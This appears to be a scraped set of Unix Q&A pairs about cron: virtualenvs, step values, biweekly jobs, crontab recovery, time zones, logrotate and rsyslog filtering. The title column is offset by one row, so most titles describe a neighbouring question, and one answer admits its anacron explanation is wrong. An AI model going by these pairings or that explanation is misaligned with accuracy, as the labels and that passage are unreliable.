| When a file path longer than 100 characters is passed, crontab throws an error saying "No such file or directory" |
1,324,046,017,000 |
I want to schedule a python script to run using cron on certain dates, the problem is that in order for example.py to work, example-env has to be activated, is there a way to make example.py activate its own virtualenv whenever cron execute it?
if not, then do I have to create a bash script bash.sh that contains
#!/usr/bin/env bash
workon example-env
python2 example.py
and then schedule that to be executed by cron on certain dates? Or do I have to do something else?
Both ways are fine with me, I just want to know the correct way to do it. Perhaps I prefer the bash script method, since I have many Python files to run, so if I put them all inside a bash script and schedule that, it seems easier for me, but again I don't know the correct way to do it, therefore I'm asking for advice.
|
You can just start the example.py with the full path to example-env/bin/python2.
Alternatively change the shebang line of the example.py to use that executable, make that file executable (chmod +x example.py) and leave out python and use the full path to example.py to start it:
#!/full/path/to/example-env/bin/python2
| How to activate Virtualenv when a Python script starts? |
1,324,046,017,000 |
Im pretty new to unix and crons, I was currently about to try to add crons to an existing cron file. I read you could do this with crontab -e. The confusing thing to me is just that crontab -e shows different crons/commands than less /etc/crontab - how come? Which one is the correct way/file to edit?
|
Although @X Tian's answer contains info on the different files for crontab, the essential information concerning your question is this:
crontab -e edits the user's crontab file (stored in the /var/spool/cron/crontabs/ directory on current Debian systems, but YMMV) or creates a new one, and not /etc/crontab. Similar for crontab -l (list crontab file) and crontab -r (remove crontab file).
For all cron jobs that should be executed under a user's account, you should use crontab -e. For system jobs, you should add a file under /etc/cron.d, if that exists; under /etc/cron.{hourly|daily|weekly|monthly} (but those must not be named like a package name!), if that fits your purpose; or add a line to /etc/crontab. But be aware that /etc/crontab might be overwritten with a system update.
| How come crontab -e is different from less /etc/crontab? |
1,324,046,017,000 |
I've done quite a bit of research in how to do this, and I see there's no direct way in cron to run a job, say, every other Thursday.
Right now, I'm leaning toward making a script that will just run every week, and will touch a "flag" file when it runs, and if it runs and the file is already there, to remove the file (and not perform the bi-weekly action).
My question is, is there any other more elegant or simpler way to accomplish this goal of a bash script of actions running every other week automatically?
Thanks!
|
0 0 * * Thu bash -c '(($(date +\%s) / 86400 \% 14))' && your-script
I used bash to do my math because I'm lazy; switch that to whatever you like. I take advantage of January 1, 1970 being a Thursday; for other days of the week you'd have to apply an offset. Cron needs the percent signs escaped.
Quick check:
function check {
when=$(date --date="$1 $(($RANDOM % 24)):$(($RANDOM % 60))" --utc)
echo -n "$when: "
(($(date +%s --date="$when") / 86400 % 14)) && echo run || echo skip
}
for start in "2010-12-02" "2011-12-01"; do
for x in $(seq 0 12); do
check "$start + $(($x * 7)) days"
done
echo
done
Note I've chosen random times to show this will work if run anytime on Thursday, and chosen dates which cross year boundaries plus include months with both 4 and 5 Thursdays.
Output:
Thu Dec 2 06:19:00 UTC 2010: run
Thu Dec 9 23:04:00 UTC 2010: skip
Thu Dec 16 05:37:00 UTC 2010: run
Thu Dec 23 12:49:00 UTC 2010: skip
Thu Dec 30 03:59:00 UTC 2010: run
Thu Jan 6 11:29:00 UTC 2011: skip
Thu Jan 13 13:23:00 UTC 2011: run
Thu Jan 20 20:33:00 UTC 2011: skip
Thu Jan 27 16:48:00 UTC 2011: run
Thu Feb 3 17:43:00 UTC 2011: skip
Thu Feb 10 05:49:00 UTC 2011: run
Thu Feb 17 08:46:00 UTC 2011: skip
Thu Feb 24 06:50:00 UTC 2011: run
Thu Dec 1 21:40:00 UTC 2011: run
Thu Dec 8 23:24:00 UTC 2011: skip
Thu Dec 15 22:27:00 UTC 2011: run
Thu Dec 22 02:47:00 UTC 2011: skip
Thu Dec 29 12:44:00 UTC 2011: run
Thu Jan 5 17:59:00 UTC 2012: skip
Thu Jan 12 18:31:00 UTC 2012: run
Thu Jan 19 04:51:00 UTC 2012: skip
Thu Jan 26 08:02:00 UTC 2012: run
Thu Feb 2 17:37:00 UTC 2012: skip
Thu Feb 9 14:08:00 UTC 2012: run
Thu Feb 16 18:50:00 UTC 2012: skip
Thu Feb 23 15:52:00 UTC 2012: run
| Run a script via cron every other week |
1,324,046,017,000 |
tl;dr: Does cron use the numerical value of an interval compared to the numerical value of the day to determine its time of execution or is it literally "every 3 days" at the prescribed time from creation?
Question:
If I add the following job with crontab -e will it run at midnight tomorrow for the first time or three days from tomorrow? Or is it only on "third" days of the month? Day 1, 4, 7, 10...?
0 0 */3 * * /home/user/script.sh
I put this cron in yesterday and it ran this morning (that might be the answer to my question) but I want to verify that this is correct. Today is the 31st and that interval value does appear to fall into the sequence. If cron starts executing an interval on the 1st of the month, will it run again tomorrow for me?
Additional notes:
There are already some excellent posts and resources about cron in general (it is a common topic I know) however the starting point for a specific interval isn't as clear to me. Multiple sources word it in multiple ways:
This unixgeeks.org post states:
Cron also supports 'step' values.
A value of */2 in the dom field would mean the command runs every two days
and likewise, */5 in the hours field would mean the command runs every
5 hours.
So what is implied really by every two days?
This answer states that a cronjob of 0 0 */2 * * would execute "at 00:00 on every odd-numbered day (default range with step 2, i.e. 1,3,5,7,...,31)"
Does cron always step from the first day of the month?
It appears that the blog states the cron will execute on the 31st and then again on the 1st of the next month (so two days in a row) due to the interval being based on the numeric value of the day.
Another example from this blog post
0 1 1 */2 * command to be executed is supposed to execute the first day of month, every two months at 1am
Does this imply that the cron will execute months 1,3,5,7,9,11?
It appears that cron is designed to execute interval cronjobs (*/3) based on the numerical value of the interval compared to the numerical value of the day (or second, minute, hour, month). Is this 100% correct?
P.S. This is a very specific question about one particular feature of cron that (I believe) needs some clarification. This should allow Google to tell you, with 100% certainty, when your "every 3 months" cron will run for the first time after it's been added to crontab.
|
The crontab(5) man page use a wording that is pretty clear:
Step values can be used in conjunction with ranges. Following a range with "/number" specifies skips of the number's value through the range. For example, "0-23/2" can be used in the hours field to specify command execution every other hour (the alternative in the V7 standard is "0,2,4,6,8,10,12,14,16,18,20,22"). Steps are also permitted after an asterisk, so if you want to say "every two hours", just use "*/2".
The exact wording (and the example) is "skips of the number's value through the range" - and it is implied that it starts at the first number in the range.
This mean if the range is 1-31 for days, the values returned in the case of 1-31/2 or */2 is 1,3,5,7.. etc. This also means that the range is reset to the start value when it has run through.
So you are also correct that in this case, the cronjob would run both on the 31th and 1st the month after.
Please note that cron has 2 fields that are mutually exclusive - the "day of month" and "day of week". So you have to choose one or the other, when running jobs with an interval of days.
If you want to define a cronjob that runs perfectly every other day, you have to use multiple lines and custom define each month according to the current calendar.
| When will an interval cron execute the first time? (Ex: */3 days) |
1,324,046,017,000 |
I was trying to edit crontab in the terminal, and I accidentally typed crontab -r instead of crontab -e. Who would figure such dangerous command would sit right next to the letter to edit the crontab? Moreover, I am still trying to figure out how does crontab -r not ask you for confirmation?
Regardless of my lack of credibility as to how this is possible, my question is: am I able to recover the lost crontab?
|
You can find your cron jobs from the log if once it has executed before. Check /var/log/cron.
You do not have any recovery option other than third party recovery tools.
| How to recover deleted crontab |
1,324,046,017,000 |
I use CentOS shared server environment with Bash.
ll "$HOME"/public_html/cron_daily/
brings:
./
../
-rwxr-xr-x 1 user group 181 Jul 11 11:32 wp_cli.sh*
I don't know why the filename has an asterisk in the end. I don't recall adding it and when I tried to change it I got this output:
[~/public_html]# mv cron_daily/wp_cli.sh* cron_daily/wp_cli.sh
+ mv cron_daily/wp_cli.sh cron_daily/wp_cli.sh
mv: `cron_daily/wp_cli.sh' and `cron_daily/wp_cli.sh' are the same file
This error might indicate why my Cpanel cronjob failed:
Did I do anything wrong when changing the file or when running the Cpanel cron command? Because both operations seem to fail.
|
The asterisk is not actually part of the filename. You are seeing it because the file is executable and your alias for ll includes the -F flag:
-F
Display a slash ('/') immediately after each pathname that is a directory, an asterisk ('*') after each that is executable, an
at sign ('@') after each symbolic link, an equals sign (`=') after each socket, a percent sign ('%') after each whiteout, and a
vertical bar ('|') after each that is a FIFO.
As Kusalananda mentioned you can't glob all scripts in a directory with cron like that. With run-parts, you can call "$HOME"/public_html/cron_daily/ to execute all scripts in the directory (not just .sh) or loop through them as mentioned in this post.
| A filename has an asterisk for some reason - it won't be changed and content not executed |
1,324,046,017,000 |
I have a Raspberry Pi running OSMC (Debian based).
I have set a cron job to start a script, sync.sh, at midnight.
0 0 * * * /usr/local/bin sync.sh
I need to stop the script at 7am. Currently I am using:
0 7 * * * shutdown -r now
Is there a better way? I feel like rebooting is overkill.
Thanks
|
You can run it with the timeout command,
timeout - run a command with a time limit
Synopsis
timeout [OPTION] NUMBER[SUFFIX] COMMAND [ARG]...
timeout [OPTION]
Description
Start COMMAND, and kill it if still running after NUMBER seconds. SUFFIX may be 's' for seconds (the default), 'm' for minutes, 'h' for hours or 'd' for days.
PS. If your sync process takes too much time, you might consider a different approach for syncing your data, maybe block replication.
| How to halt a script at a specific time until it is started again by cron? |
1,324,046,017,000 |
It looks like I have logcheck set up as a cron job and whenever it's run process grep by logcheck takes up around ¼ of my CPU.
Now I have certain times during which I need my full CPU capacity and have my system take up fewest resources as possible except for specific/processes (which I maybe could specify somehow).
Is it possible to set my Debian 9.1 with KDE machine into some sort of performance mode (or 'Gaming mode') that prevents processes not explicitly started by the user from taking up much system resources, lowers the load of background-processes and most importantly: delays cron jobs until that mode is stopped again?
|
If “certain times” aren’t fixed, i.e. you want to specify manually when your system enters and leaves “performance mode”, you can simply stop and start cron:
sudo systemctl stop cron
will prevent any cron jobs from running, and
sudo systemctl start cron
will re-enable them.
You could also check out anacron instead of cron, it might be easier to tweak globally in a way which would fit your uses.
| How to prevent cron jobs from being run during certain times in Debian? (a 'gaming' / 'performance mode') |
1,324,046,017,000 |
I have created a script to install two scripts on to the crontab.
#!/bin/bash
sudo crontab -l > mycron
#echo new cron into cron file
echo "*/05 * * * * bash /mnt/md0/capture/delete_old_pcap.sh" >> mycron #schedule the delete script
echo "*/12 * * * * bash /mnt/md0/capture/merge_pcap.sh" >> mycron #schedule the merge script
#install new cron file
crontab mycron
rm mycron
The script runs, and add the two lines to the crontab. But if I run the script again, it adds those lines again , thus I will have four lines saying the same stuff. I want the install script to run such that, the lines inserted to the crontab do not repeat. How can I do that
|
I would recommend using /etc/cron.d over crontab.
You can place files in /etc/cron.d which behave like crontab entries. Though the format is slightly different.
For example
/etc/cron.d/pcap:
*/05 * * * * root bash /mnt/md0/capture/delete_old_pcap.sh
*/12 * * * * root bash /mnt/md0/capture/merge_pcap.sh
The difference in the format is adding the user to run the job as after the time specification.
Now you can simply check if the file exists, and if you overwrite it, it doesn't matter.
Note that it's possible your cron daemon might not have /etc/cron.d. I do not know which cron daemons have it, but vixie cron is the the standard cron daemon on linux, and it does.
| Installing crontab using bash script |
1,324,046,017,000 |
Is there any way to make/run a bash script on reboot
(like in Debian/Ubuntu for instance, since thats what my 2 boxes at home have)
Also, any recommended guides for doing cron jobs? I'm completely new to them (but they will be of great use)
|
On Ubuntu/Debian/Centos you can set up a cron job to run @reboot. This runs once at system startup. Use crontab -e to edit the crontab and add a line like the example below e.g.
@reboot /path/to/some/script
There are lots of resources for cron if you look for them. This site has several good examples.
| Bash Script on Startup? (Linux) |
1,324,046,017,000 |
In my /etc/crontab file I have:
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
I know what this does in practice but I don't understant the command lines.
Man "test" doesn't help at all:
test - check file types and compare values
Any help would be greatly appreciated
|
From FreeBSD's man test: [1]
-x file True if file exists and is executable. True indicates only
that the execute flag is on. If file is a directory, true
indicates that file can be searched.
So the cronjobs test if there is anacron installed [2] (i.e., there is an executable called anacron in the expected place) and run something if not - namely the scripts in the respective /etc/cron.* folders.
(1) Bash's builtin test has the same -x option
(2) Anacron is a cron replacement designed for computers that are not always running, i.e., if there's a job to be run weekly, it will be run weekly, relative to the uptime of the computer, which means it will not run every, say, friday, but every 24*7 hours of uptime. (Edit I got it all wrong, see comments)
| /etc/crontab what does "test -x" stand for |
1,324,046,017,000 |
I have a test.sh script
#!/bin/sh
php /home/v/file.php
sh /root/x/some.sh
when I execute the file as root from command line it works.
sh /home/v/test.sh
when I set it to crontab -e (is the root cron), is not working
* * * * * sh /home/v/test.sh
What do I do wrong?
Thanks
|
According to the man:
The cron daemon starts a subshell
from your HOME directory. If you
schedule a command to run when you are
not logged in and you want commands
in your .profile file to run, the
command must explicitly read your
.profile file.
The cron daemon supplies a default
environment for every shell, defining
HOME, LOGNAME, SHELL (=/usr/bin/sh),
and PATH (=/usr/bin).
So cron daemon doesn't know where php is and you should specify the full php path by hand, for example (I don't know your real PHP path):
#!/bin/sh
/usr/local/bin/php /home/v/file.php
sh /root/x/some.sh
Another way is to source the /etc/profile (or your .profile/.bashrc), for example
* * * * * . /home/v/.bashrc ; sh /home/v/test.sh
This is useful if your .bashrc set the environment variables that you need (i.e. PATH)
EDIT
An interesting reading is "Newbie: Intro to cron", don't undervalue the article from the title (It's a reading for everybody), in fact it's well written complete and answer perfectly to your question:
...
PATH contains the directories which
will be in the search path for cron
e.g if you've got a program 'foo' in
the directory /usr/cog/bin, it might
be worth adding /usr/cog/bin to the
path, as it will stop you having to
use the full path to 'foo' every time
you want to call it.
...
| executing a sh script from the cron |
1,324,046,017,000 |
I am aware of a lot of pitfalls in the magic world of crontabs, but sometimes it would help troubleshooting a lot when you have some smart way to enter an interactive (bash) shell with exact identical environment as when a shell script is run from a crontab.
Now I thought myself of /bin/openvt -c8 -- /bin/bash --noprofile -l, but it require root privileges, sets too many variables and a simple su myusername sets a lot of extra environment.
Anybody know of a way to start a interactive bash shell with identical-to-cron environtment and not requiring root privileges on Kubuntu?
Bonus when it works in an ssh session, in the GUI and on one or more of the following OS's too: HP-UX, Solaris and AIX
|
Run crontab -e and add an entry with
* * * * * export -p > ~/cron-env
(if on Solaris or a system that doesn't use a POSIX shell to interpret that command line, use /usr/xpg4/bin/sh -c 'export -p > ~/cron-env' or whatever the path to the standard sh is on that system).
Wait one minute and remove that line.
You should now have a cron-env file in your home directory.
You can then run:
cd && env -i sh -c '. ./cron-env; exec sh'
To start a shell with the same environment as your cron job got.
| Interactive shell with environment identical to cron |
1,324,046,017,000 |
As I know crontab has those fields, starting by left to right.
1 minutes 0-59
2 hours 0-23
3 days of month 0-31
4 month 1-12
5 day of the week 0-6
6 command
I want to run foo command every 15 days at 15:30
This is correct because run command 1 and 15 of the month
month has 30 days(31 some) so is run every 15 days
30 15 1,15 * * /sbin/foo -a 1> /dev/null
Is also correct this syntax?
30 15 */15 * * /sbin/foo -a 1> /dev/null
System is Slackware Linux which use Dillon Cron
|
This syntax 30 15 */15 * * is correct, but it is not doing the same with this 30 15 1,15 * *.
The latter will execute command at 1st and 15th of the month, as it has fixed comma separated values for the "day of month" field.
The / defines steps, that means */15 will execute every 15 days, starting from 1, that means: 1st, 16th (for all months) and also 31th (for any month having 31 days).
As man crontab(5) says, step values can be used in conjunction with ranges. So if you want to have the same result using the / syntax you could do: 30 15 1-15/14 * * which means 30 15 1,15 * *.
Another example, if you want to run every 15 days, but on 5th and 20th of every month: 5-20/15. Of course, for this case, it is more readable to write 5,20. But combining the range with the steps, enables defining the start-end of the ranged execution.
For Day 1,3,5,7 etc of the Month: */2
For Day 2,4,6,8 etc of the Month: 2-30/2
For Minutes(0-59) and Hours(0-23), the first valid value is 0 so this: 0 */2 * * * means at 00:00, 02:00, 04:00 etc.
| Should I use 1,15 or */15 in crontab to run a command every 15 days? |
1,324,046,017,000 |
I'm building on top of a Postgres Docker container which has cron implemented on top of Debian Jessie:
For debugging I want to look at the logs which I'm expecting to be at /var/log/syslog, but I don't have syslog on the system.
Would I need to turn on logging manually with a Debian Jessie Docker container?
|
You need to install rsyslog inside the container. You could do this in dockerfile.
Example of simplest dockerfile:
FROM debian:latest
RUN apt-get install -q -y rsyslog
CMD ["sh", "-c", "service rsyslog start ; tail -f /dev/null"]
| Docker Debian Jessie: Can't find /var/log/syslog |
1,324,046,017,000 |
The following appears /var/log/messages, what that means ?
Feb 19 22:51:20 kernel: [ 187.819487] non-matching-uid symlink following attempted in sticky world-writable directory by sh (fsuid 1001 != 0)
It happens when a cron job was about to run.
|
A privileged process can be tricked into overwriting an important file (/etc/passwd, /etc/shadow, etc.) by pointing a symlink at it. For example, if you know that root will run a program that creates a file in /tmp, you can lay a trap by guessing what the file name will be (typically /tmp/fooXXX, with foo being the program name and XXX being the process ID) and fill /tmp with likely candidates pointing at /etc/shadow. Later, root opens the file in /tmp, truncates and overwrites /etc/shadow and suddenly no one can log into the system anymore. There is a related attack that exploits a race condition between checking for the existence of a temp file and the creation of the file.
There are ways to avoid this problem, including careful use of mktemp() and mkstemp(), but not all programmers and users will be aware of this risk. As a result, a Linux kernel patch was proposed recently and apparently it has been applied to the kernel that you're using. The patch prevents following symlinks in one of the common situations where the malicious link might have been planted: a world-writable directory with the sticky bit set, which is the way /tmp is normally configured on Unix systems. Instead of following the symlink, the attempted system call fails with EACCES and the kernel logs the message that you saw.
Some related chatter on the Linux kernel mailing list.
| What does the following kernel message mean? |
1,324,046,017,000 |
Why does cron require MTA for logging? Is there any particular advantage to this? Why can't it create a log file like most other utilities?
|
Consider that the traditional "standard" way of logging data is syslog, where the metadata included in the messages are the "facility code" and the priority level. The facility code can be used to separate log streams from different services so that they can be split into different log files, etc. (even though the facility codes are somewhat limited in that they have fixed traditional meanings.)
What syslog doesn't have, is a way to separate messages for or from different users, and that's something that cron needs on a traditional multi-user system. It's no use collecting the messages from all users' cron jobs to a common log file where only the system administrator can see them. On the other hand, email naturally provides for sending messages to different users, so it's a logical choice here. The alternative would be for cron to do the work manually, and to create logfiles to each users' home directory, but a traditional multi-user Unix system would be assumed to have a working MTA, so implementing it in cron would have been mostly a futile exercise.
On modern systems, there might be alternative choices, of course.
| Why does cron require MTA for logging? |
1,324,046,017,000 |
I have an rsync cron job which is pushing the server load and triggering monitor alerts. If I set the job to be run with a high nice level, would that effectively reduce the impact it has on system load values?
|
It will not reduce your load.
It will only let other processes use CPU time more often if there is a possible resource contention (several processes "competing" for not enough available CPU time).
| Is setting a higher nice level for a process an effective way to reduce its impact on system load/CPU time? |
1,324,046,017,000 |
I need to calculate the time remaining for the next run of a specific job in my Cron Schedule, I've a Cron with jobs having frequencies of per hour, thrice a day etc, no jobs running on specific days/dates hence just HH:MM:SS is concerned, also I do not have right to check /var/spool/cron/ in my RHEL.
If some job starts at 9:30,
30 9 * * * /some/job.sh
-bash-3.2$ date +"%H:%M"
13:52
I'd need output as, 19 Hours and 38 Minutes How would I be knowing the total time until next run occurs from current system time? Calculation of seconds is concerned only around the job time.
|
cron doesn't know when a job is going to fire. All it does is every minute, go over all the crontab entries and fire those that match "$(date '+%M %H %d %m %w')".
What you could do is generate all those timestamps for every minute from now to 49 hours from now (account for DST change), do the matching by hand (the tricky part) and report the first matching one.
Or you could use the croniter python module:
python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("3 9 * * *", datetime.now())
print(iter.get_next(datetime))'
For the delay:
$ faketime 13:52:00 python -c '
from croniter import croniter
from datetime import datetime
d = datetime.now()
iter = croniter("30 9 * * *", d)
print iter.get_next(datetime) - d'
19:37:59.413956
Beware of potential bugs around DST changes though:
$ faketime '2015-03-28 01:01:00' python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("1 1 * * *", datetime.now())
print iter.get_next(datetime)'
2015-03-29 02:01:00
$ FAKETIME_FMT=%s faketime -f 1445734799 date
Sun 25 Oct 01:59:59 BST 2015
$ FAKETIME_FMT=%s faketime -f 1445734799 python -c '
from croniter import croniter
from datetime import datetime
iter = croniter("1 1 * * *", datetime.now())
print iter.get_next(datetime)'
2015-10-25 01:01:00
$ FAKETIME_FMT=%s faketime -f 1445734799 python -c '
from croniter import croniter
from datetime import datetime
d = datetime.now()
iter = croniter("1 1 * * *", d)
print iter.get_next(datetime) - d'
-1 day, 23:01:01
cron itself takes care of that by avoiding to run the job twice if the time has gone backward, or run skipped jobs after the shift if the time has gone forward.
| Time remaining for the next run |
1,324,046,017,000 |
I'm running Ubuntu 14.04 LTS and nginx on a Digital Ocean VPS and occasionally receive these emails about a failed cron job:
Subject
Cron test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
The body of the email is:
/etc/cron.daily/logrotate:
error: error running shared postrotate script for '/var/log/nginx/*.log '
run-parts: /etc/cron.daily/logrotate exited with return code 1
Any thoughts on how I can resolve this?
Update:
/var/log/nginx/*.log {
weekly
missingok
rotate 52
compress
delaycompress
notifempty
create 0640 www-data adm
sharedscripts
prerotate
if [ -d /etc/logrotate.d/httpd-prerotate ]; then \
run-parts /etc/logrotate.d/httpd-prerotate; \
fi
endscript
postrotate
invoke-rc.d nginx rotate >/dev/null 2>&1
endscript
}
Update:
$ sudo invoke-rc.d nginx rotate
initctl: invalid command: rotate
Try `initctl --help' for more information.
|
The post rotate action appears to be incorrect
Try
invoke-rc.d nginx reload >/dev/null 2>&1
If you look at the nginx command you will see the actions it will accept. Also the message you got says check initctl --help
xtian@fujiu1404:~/tmp$ initctl help
Job commands:
start Start job.
stop Stop job.
restart Restart job.
reload Send HUP signal to job.
status Query status of job.
list List known jobs.
so reload should work and send HUP signal to nginx to force reopen of logfiles.
| nginx logrotate error on cron job |
1,324,046,017,000 |
Background: I am working on CentOS
Details
# cat /proc/version
Linux version 2.6.18-308.4.1.el5PAE ([email protected]) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-52)) #1 SMP Tue Apr 17 17:47:38 EDT 2012
Question: How can i know which version cron daemon installed and running on machine
|
The dummy way:
whereis -b crontab | cut -d' ' -f2 | xargs rpm -qf
| How to get which version of cron daemon is running |
1,324,046,017,000 |
Is there a way to schedule a cron job to run every fortnight?
(One way I can think of, within crontab, would be to add two entries for "date-of-month"...)
|
No, cron only knows about the day of the week, the day of the month and the month.
Running a command twice a month on fixed days (e.g. the 1st and the 16th) is easy:
42 4 1,16 * * do_stuff
Running a command every other week is another matter. The best you can do is to run a command every week, and make it do nothing every other week. On Linux, you can divide the number of seconds since the epoch (date +%s) by the number of seconds in a week to get a number that flips parity every week. Note that in a crontab, % needs to be escaped (cron turns % into newlines before executing the command).
42 4 * * 1 case $(($(date +\%s) / (60*60*24*7))) in *[02468]) do_stuff;; esac
| Is it possible to schedule a cron job to run fortnightly? |
1,324,046,017,000 |
I use a cron job to call offlineimap every 2 minutes:
*/2 * * * * /usr/bin/offlineimap > ~/Maildir/offlineimap.log 2>&1
I needed to kill the cron job to fix a problem. How can I then restart the cron job (without rebooting)? I found this 'solution' online:
mylogin@myhost:~$ sudo /etc/init.d/cron restart
Rather than invoking init scripts through /etc/init.d, use the service(8)
utility, e.g. service cron restart
Since the script you are attempting to invoke has been converted to an
Upstart job, you may also use the stop(8) and then start(8) utilities,
e.g. stop cron ; start cron. The restart(8) utility is also available.
cron stop/waiting
cron start/running, process 26958
However, using ps -ef | grep ..., I don't see the job... What's wrong?
|
Cron approach
If you have sudo privileges you could stop/start the cron service. I believe that's what that solution you found online was explaining.
Depending on which Linux distro you're using you could either do these commands:
# redhat distros
$ sudo /etc/init.d/crond stop
... do your work ...
$ sudo /etc/init.d/crond start
Or do these commands:
# Debian/Ubuntu distros
$ sudo service cron stop
... do your work ...
$ sudo service cron start
Lock file type approach
You could also put a "dontrunofflineimap" file in say the /tmp directory when you want the offlineimap task to hold off and not run for a bit.
The process would work like this. You touch a file in /tmp like so:
touch /tmp/dontrunofflineimap
The cron job would be modified like so:
*/2 * * * * [ -f /tmp/dontrunofflineimap ] || /usr/bin/offlineimap > ~/Maildir/offlineimap.log 2>&1
While that file exists, it will essentially block the offlineimap app from running. When you want it to resume, simply delete the /tmp/dontrunofflineimap file.
| How to start a cron job without reboot? |
1,324,046,017,000 |
I have a cronjob which is executes every day at 9:00 AM of UTC-Time. I'm in GMT+1 so it executes at 10:00 AM local time. When there is the timezone change (to daylight saving time, DST), the cronjob executes still at 9:00 AM of UTC-Time but at 11:00 AM local time. But I want it always to execute at 10:00, no matter of summer time or not. How do I do that?
|
Check your setting in /etc/timezone. In the question you mentioned you are in "GMT+1", if that is what your timezone is set to, your script will always execute at UTC plus one hour. If you set it to e.g. "Europe/Paris", the time of execution will change with the daylight savings time.
| Change the time zone of a cronjob |
1,324,046,017,000 |
I have setup emacs as my default editor in /etc/profile. When I want to use emacs in a terminal. I open it with the -nw option. How can I have the same behavior when doing a crontab -e preventing it to open in a window?
|
You have to use
export EDITOR="emacs -nw"
with the quotes, and it should work as expected.
| Open emacs in a terminal when editing crontab |
1,324,046,017,000 |
In my /etc/rsyslog.conf, I have the following line to log the auth facility into /var/log/auth.log:
auth,authpriv.* /var/log/auth.log
but the file is flooded with cron logs, such as these:
CRON[18620]: pam_unix(cron:session): session opened for user root by (uid=0)
CRON[18620]: pam_unix(cron:session): session closed for user root
I would like to get rid of the cron logs, and only have real "auth" events being logged into that file. By that I mean, I want to see which users have logged into the system, or made su -.
How can I achieve that?
|
I believe this is what you are looking for:
:msg, contains, "pam_unix(cron:session)" ~
auth,authpriv.* /var/log/auth.log
the first line matches cron auth events, and deletes them. The second line then logs as per your rule, minus the previously deleted lines.
| don't log cron events in auth.log |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.